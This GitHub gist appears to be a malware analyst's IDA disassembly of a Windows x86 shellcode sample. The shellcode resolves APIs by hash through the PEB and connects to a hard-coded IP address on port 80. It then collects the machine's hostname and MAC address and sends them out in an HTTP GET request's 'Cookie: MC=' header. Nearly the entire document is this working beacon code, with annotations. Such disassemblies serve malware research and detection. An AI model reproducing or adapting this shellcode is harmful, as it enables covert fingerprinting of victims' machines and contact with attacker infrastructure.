Created
November 30, 2016 00:15
-
-
Save 0xEBFE/87f254b5a50d5bfedc2bebce6b072030 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; Input SHA256 : 3A74FBDF96B5E73F930F5887A82E4008FFB8484AE180DD3F7DE7480BC5577345 | |
; Input MD5 : 614D07EF7777CFF5CFDF741587A097DA | |
; Input CRC32 : B326AB6B | |
; --------------------------------------------------------------------------- | |
; File Name : D:\_anal_temp\shellcode2.bin | |
; Format : Binary file | |
; Base Address: 0000h Range: 0000h - 02FCh Loaded length: 02FCh | |
.686p | |
.mmx | |
.model flat | |
; =========================================================================== | |
; Segment type: Pure code | |
seg000 segment byte public 'CODE' use32 | |
assume cs:seg000 | |
assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing | |
cld | |
call sub_8F | |
; =============== S U B R O U T I N E ======================================= | |
sub_6 proc near | |
var_4 = dword ptr -4 | |
pusha | |
mov ebp, esp | |
xor edx, edx | |
mov edx, fs:[edx+30h] | |
mov edx, [edx+0Ch] | |
mov edx, [edx+14h] | |
loc_15: ; CODE XREF: sub_6+87j | |
mov esi, [edx+28h] | |
movzx ecx, word ptr [edx+26h] | |
xor edi, edi | |
loc_1E: ; CODE XREF: sub_6+26j | |
xor eax, eax | |
lodsb | |
cmp al, 61h ; 'a' | |
jl short loc_27 | |
sub al, 20h ; ' ' | |
loc_27: ; CODE XREF: sub_6+1Dj | |
ror edi, 0Dh | |
add edi, eax | |
loop loc_1E | |
push edx | |
push edi | |
mov edx, [edx+10h] | |
mov eax, [edx+3Ch] | |
add eax, edx | |
mov eax, [eax+78h] | |
test eax, eax | |
jz short loc_89 | |
add eax, edx | |
push eax | |
mov ecx, [eax+18h] | |
mov ebx, [eax+20h] | |
add ebx, edx | |
loc_4A: ; CODE XREF: sub_6+60j | |
jecxz short loc_88 | |
dec ecx | |
mov esi, [ebx+ecx*4] | |
add esi, edx | |
xor edi, edi | |
loc_54: ; CODE XREF: sub_6+58j | |
xor eax, eax | |
lodsb | |
ror edi, 0Dh | |
add edi, eax | |
cmp al, ah | |
jnz short loc_54 | |
add edi, [ebp-8] | |
cmp edi, [ebp+24h] | |
jnz short loc_4A | |
pop eax | |
mov ebx, [eax+24h] | |
add ebx, edx | |
mov cx, [ebx+ecx*2] | |
mov ebx, [eax+1Ch] | |
add ebx, edx | |
mov eax, [ebx+ecx*4] | |
add eax, edx | |
mov [esp+28h+var_4], eax | |
pop ebx | |
pop ebx | |
popa | |
pop ecx | |
pop edx | |
push ecx | |
jmp eax | |
; --------------------------------------------------------------------------- | |
loc_88: ; CODE XREF: sub_6:loc_4Aj | |
pop eax | |
loc_89: ; CODE XREF: sub_6+37j | |
pop edi | |
pop edx | |
mov edx, [edx] | |
jmp short loc_15 | |
sub_6 endp ; sp-analysis failed | |
; =============== S U B R O U T I N E ======================================= | |
; Attributes: noreturn | |
sub_8F proc near ; CODE XREF: seg000:00000001p | |
pop ebp | |
lea eax, [ebp+297h] ; ws2_32 | |
push eax | |
push kernel32_LoadLibraryA_hash | |
call ebp | |
test eax, eax | |
jz loc_22B | |
lea eax, [ebp+29Eh] ; IPHLPAPI | |
push eax | |
push kernel32_LoadLibraryA_hash | |
call ebp | |
test eax, eax | |
jz loc_22B | |
mov ebx, 190h | |
sub esp, ebx | |
push esp | |
push ebx | |
push ws2_32_WSAStartup_hash | |
call ebp | |
add esp, ebx | |
test eax, eax | |
jnz loc_22B | |
push eax | |
push eax | |
push eax | |
push eax | |
inc eax | |
push eax | |
inc eax | |
push eax | |
push ws2_32_WSASocketA_hash | |
call ebp | |
xor ebx, ebx | |
not ebx | |
cmp ebx, eax | |
jz loc_22B | |
mov ebx, eax | |
loc_F3: ; CODE XREF: sub_8F+8Bj | |
push 0E21B2705h ; 5.39.27.226 | |
push small 5000h ; 80 | |
xor ecx, ecx | |
add cl, 2 | |
push cx | |
mov edx, esp | |
push 10h | |
push edx | |
push ebx | |
push ws2_32_connect_hash | |
call ebp | |
test eax, eax | |
jz short loc_11C | |
dec byte ptr [ebp+248h] | |
jnz short loc_F3 | |
loc_11C: ; CODE XREF: sub_8F+83j | |
mov eax, 100h | |
sub esp, eax | |
mov edx, esp | |
push edx | |
push eax | |
push edx | |
push ws2_32_gethostname_hash | |
call ebp | |
pop edi | |
add esp, 100h | |
test eax, eax | |
jnz loc_234 | |
push edi | |
call get_str_len | |
pop esi | |
mov edx, ecx | |
lea edi, [ebp+2A7h] ; GET /0a821a80/05dc0212 HTTP/1.1 | |
; Host: | |
call get_str_len | |
dec edi | |
cmp edx, 20h ; ' ' | |
jl short loc_15D | |
mov edx, 20h ; ' ' | |
loc_15D: ; CODE XREF: sub_8F+C7j | |
mov ecx, edx | |
push esi | |
rep movsb | |
mov ecx, 0Dh | |
lea esi, [ebp+28Ah] ; Cookie: | |
rep movsb | |
mov [ebp+244h], edi | |
pop esi | |
push esi | |
push ws2_32_gethostbyname_hash ; gets computername | |
call ebp | |
test eax, eax | |
jz loc_234 | |
mov cx, [eax+0Ah] | |
cmp cx, 4 | |
jb loc_234 | |
lea eax, [eax+0Ch] | |
mov eax, [eax] | |
mov ecx, [eax] | |
mov ecx, [ecx] | |
mov eax, 100h | |
push eax | |
mov edi, esp | |
sub esp, eax | |
mov esi, esp | |
push edi | |
push esi | |
push ecx | |
push ecx | |
push IPHLPAPI_SendARP_hash | |
call ebp | |
test eax, eax | |
add esp, 104h | |
movzx ecx, word ptr [edi] | |
cmp ecx, 6 | |
jb short loc_234 | |
mov ecx, 6 | |
mov eax, 10h | |
sub esp, eax | |
mov edi, esp | |
mov edx, ecx | |
shl edx, 1 | |
push eax | |
push edx | |
loc_1D8: ; CODE XREF: sub_8F+173j | |
xor edx, edx | |
mov dl, [esi] | |
mov al, dl | |
and al, 0F0h | |
shr al, 4 | |
cmp al, 9 | |
ja short loc_1EB | |
add al, 30h ; '0' | |
jmp short loc_1ED | |
; --------------------------------------------------------------------------- | |
loc_1EB: ; CODE XREF: sub_8F+156j | |
add al, 37h ; '7' | |
loc_1ED: ; CODE XREF: sub_8F+15Aj | |
mov [edi], al | |
inc edi | |
mov al, dl | |
and al, 0Fh | |
cmp al, 9 | |
ja short loc_1FC | |
add al, 30h ; '0' | |
jmp short loc_1FE | |
; --------------------------------------------------------------------------- | |
loc_1FC: ; CODE XREF: sub_8F+167j | |
add al, 37h ; '7' | |
loc_1FE: ; CODE XREF: sub_8F+16Bj | |
mov [edi], al | |
inc edi | |
inc esi | |
loop loc_1D8 | |
pop ecx | |
sub edi, ecx | |
mov esi, edi | |
pop eax | |
add esp, eax | |
mov edi, [ebp+244h] | |
rep movsb | |
call mem_copy | |
xor eax, eax | |
push eax | |
push ecx | |
sub edi, ecx | |
dec edi | |
push edi | |
push ebx | |
push ws2_32_send_hash | |
call ebp | |
jmp short loc_234 | |
; --------------------------------------------------------------------------- | |
loc_22B: ; CODE XREF: sub_8F+11j sub_8F+27j ... | |
push 0 | |
push ntdll_RtlExitUserThread_hash | |
call ebp | |
loc_234: ; CODE XREF: sub_8F+A9j sub_8F+F1j ... | |
push ebx | |
push ws2_32_closesocket_hash | |
call ebp | |
jmp short loc_22B | |
sub_8F endp | |
; =============== S U B R O U T I N E ======================================= | |
get_str_len proc near ; CODE XREF: sub_8F+B0p sub_8F+BEp ... | |
xor ecx, ecx | |
not ecx | |
xor eax, eax | |
repne scasb | |
not ecx | |
dec ecx | |
retn | |
get_str_len endp | |
; --------------------------------------------------------------------------- | |
align 4 | |
db 2 dup(0), 3 | |
; =============== S U B R O U T I N E ======================================= | |
mem_copy proc near ; CODE XREF: sub_8F+185p | |
lea edi, [ebp+2A7h] | |
call get_str_len | |
dec edi | |
mov ecx, 4Fh ; 'O' | |
lea esi, [ebp+26Eh] ; Accept-Encoding: gzip | |
rep movsb | |
lea edi, [ebp+2A7h] | |
call get_str_len | |
retn | |
mem_copy endp | |
; --------------------------------------------------------------------------- | |
aAcceptEncoding db 0Dh,0Ah | |
db 'Accept-Encoding: gzip',0Dh,0Ah | |
db 0Dh,0Ah,0 | |
db 0Dh | |
db 0Ah | |
aCookie db 'Cookie: ' | |
aMc db 'MC=' | |
aWs2_32 db 'ws2_32' | |
db 0 | |
aIphlpapi db 'IPHLPAPI',0 | |
aGet0a821a8005d db 'GET /0a821a80/05dc0212 HTTP/1.1',0Dh,0Ah | |
db 'Host: ',0 | |
align 4 | |
dd 8 dup(0) | |
dd 41900000h | |
seg000 ends | |
end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment